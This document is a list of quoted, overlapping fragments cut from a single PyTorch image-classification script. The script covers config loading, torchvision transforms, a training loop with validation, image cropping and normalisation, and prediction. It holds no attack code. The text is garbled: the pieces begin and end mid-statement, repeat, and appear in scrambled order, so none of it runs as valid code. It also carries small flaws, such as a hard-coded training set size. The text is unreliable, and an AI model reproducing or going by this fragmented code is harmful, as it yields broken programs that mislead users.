"# Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train',",
"import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv'))",
"= 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss",
"{epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with",
"labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels",
"'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes",
"def process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns processed",
"(images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 ==",
"optim from torch.optim import lr_scheduler import copy import time from PIL import Image",
"sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream",
"Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path):",
"torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %',",
"0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs =",
"left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin,",
"array Scales, crops, and normalizes a PIL image for a PyTorch model, returns",
":return: Prediction(as a list) on test folder defined by config file \"\"\" model",
"left_margin = (img.width - 224) / 2 bottom_margin = (img.height - 224) /",
"top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction",
"inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 =",
"/ len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs,",
"torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item()",
"import copy import time from PIL import Image from datetime import datetime from",
"dictionary having train and val as keys :param print_progress: prints progress if true",
"= 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs",
"img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch",
"for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects =",
"dataloaders: Dataloaders, must be a dictionary having train and val as keys :param",
"* (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 =",
"with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs",
"model def process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns",
"enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long)",
"import os import torch import torchvision import matplotlib.pyplot as plt import seaborn as",
"= torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx",
"* data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path']",
"PIL import Image from datetime import datetime from utils import * data_dir =",
"img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224)",
"= len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if",
"if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}')",
"Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model:",
"yaml import numpy as np # linear algebra import pandas as pd #",
"= copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts)",
"having train and val as keys :param print_progress: prints progress if true :return:",
"valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs,",
"copy import time from PIL import Image from datetime import datetime from utils",
"ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5",
"Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for",
"copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss =",
"file I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as",
"in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels =",
"{x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes =",
"# provided std img = (img - mean) / std return img #",
"for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name]",
"class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for",
"1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() *",
"labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels",
"function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must",
"0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(),",
"provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img = (img",
"= (img - mean) / std return img # Load test dataset from",
"num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in",
"prints progress if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts",
"images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices =",
"array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256))",
"train and val as keys :param print_progress: prints progress if true :return: trained",
"std img = (img - mean) / std return img # Load test",
"datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub",
"{epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1",
"transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]),",
"= {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if",
"else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _,",
"transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train':",
"+ 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since",
"(inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device)",
"out = model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss",
"datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler import copy",
"= (img.width - 224) / 2 bottom_margin = (img.height - 224) / 2",
"img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean =",
"return model def process_image(img_path): \"\"\" :param img_path: Path of image to be processed",
"print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of",
"time from PIL import Image from datetime import datetime from utils import *",
"classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i,",
":returns processed numpy array Scales, crops, and normalizes a PIL image for a",
"= -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train()",
"utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class",
"of Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress",
"= model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss =",
"(iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset)",
"processing, CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision import",
"Get configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size",
"if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%',",
"top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406])",
"np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in",
"0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps)",
"lr_scheduler import copy import time from PIL import Image from datetime import datetime",
"= config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data =",
"{epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() -",
"= sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream =",
"yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data']",
"from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,",
"np # linear algebra import pandas as pd # data processing, CSV file",
"data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True,",
"time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed",
"in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for",
"0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(),",
"{:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\"",
"transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test':",
"1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss +=",
"labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch:",
"to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for",
"labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds =",
"6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss /",
"model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1,",
"# running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1",
"(e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt import",
"True :return: Prediction(as a list) on test folder defined by config file \"\"\"",
"import datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test')",
"0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,),",
"model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image to be",
"as transforms from torchvision import datasets,models import math import torch.optim as optim from",
"must be a dictionary having train and val as keys :param print_progress: prints",
"print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param dataloader: Test",
"model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in",
"train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch",
"/ len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss",
"Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) #",
"256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) /",
"right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456,",
"indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes",
"{:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1}",
"len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss:",
"%') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts =",
"since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0",
"batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x])",
"right_margin = left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin,",
"1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss =",
"class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)",
"Number of epochs :param dataloaders: Dataloaders, must be a dictionary having train and",
"Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in",
"num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss",
"if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict())",
"top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes =",
"transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)),",
"Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\"",
"normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders",
"in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i]",
"'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([",
"labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) #",
"PIL image for a PyTorch model, returns a Numpy array \"\"\" img =",
"= '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda",
"linear algebra import pandas as pd # data processing, CSV file I/O (e.g.",
"seaborn as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import",
"for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available()",
"pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt import seaborn",
"230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224,",
"(iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval()",
"- since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy",
"torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import",
"config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data']",
"dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']}",
"valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f}",
"a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]:",
"valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456,",
"224) / 2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin",
"torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from",
"mean std = np.array([0.229, 0.224, 0.225]) # provided std img = (img -",
"shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for",
"if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps",
"object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch =",
"Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math import",
"\"\"\" :param model_path: Path of Model used for prediction :param dataloader: Test DataLoader",
"device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion,",
"= img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean",
"inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds",
"top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices]",
"ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps =",
"inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs)",
"ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist()",
"# print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation",
"data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] =",
"std return img # Load test dataset from class defined in utils test_dataset",
"plt import seaborn as sns import torch.nn as nn from torch.utils.data import Dataset,",
"= bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img",
"= transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230,",
"f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print()",
"valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best",
"batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class =",
"test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path,",
"== labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r')",
"== labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\"",
"optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if",
"in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names",
"transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load",
"print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device)",
"start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images",
"mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225])",
"224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) #",
"folder defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if",
"import datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler import",
"x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=",
"< min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val",
"torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for",
"400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]),",
"from torch.optim import lr_scheduler import copy import time from PIL import Image from",
"normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for",
"utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir,",
"config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate",
"inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out =",
"\"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval()",
"in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used",
"as pd # data processing, CSV file I/O (e.g. pd.read_csv) import os import",
"Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader",
"len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1}",
"= (img.height - 224) / 2 right_margin = left_margin + 224 top_margin =",
"# Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test'])",
"a PIL image for a PyTorch model, returns a Numpy array \"\"\" img",
"labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1",
"config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")",
"inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1)",
"as keys :param print_progress: prints progress if true :return: trained model object \"\"\"",
"epochs :param dataloaders: Dataloaders, must be a dictionary having train and val as",
"]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224,",
"= time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed %",
"as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms",
"idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in",
"= labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1)",
"data processing, CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision",
"class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model",
"model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions",
"in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects",
"dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param dataloader:",
"0.224, 0.225]) # provided std img = (img - mean) / std return",
":param dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a",
"normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([",
"/ 2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin +",
"image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model,",
"loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2",
"+= torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f}",
"print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 =",
": {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss =",
"import Image from datetime import datetime from utils import * data_dir = '.'",
"# Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices",
"running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 +",
"= copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss",
"crops, and normalizes a PIL image for a PyTorch model, returns a Numpy",
"torch.optim import lr_scheduler import copy import time from PIL import Image from datetime",
"else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False):",
"def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type",
"len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss =",
"key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of",
"# data processing, CSV file I/O (e.g. pd.read_csv) import os import torch import",
"* inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 +",
"test folder defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\"",
"(img.height - 224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin",
"min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss:",
"train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']):",
":param img_path: Path of image to be processed :returns processed numpy array Scales,",
"import torch import torchvision import matplotlib.pyplot as plt import seaborn as sns import",
"torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x:",
"progress if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts =",
"from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models",
"completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path:",
"images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _,",
"sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx",
"Dataloaders, must be a dictionary having train and val as keys :param print_progress:",
"in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x",
"loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects",
"val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model",
"= np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std",
"a list) on test folder defined by config file \"\"\" model = torch.load(model_path)",
"on test folder defined by config file \"\"\" model = torch.load(model_path) device =",
"= image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path,",
"_, img_names) in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0:",
"224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),",
"loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch:",
"test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx =",
"/ std return img # Load test dataset from class defined in utils",
"\"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names)",
"def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction",
"inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad()",
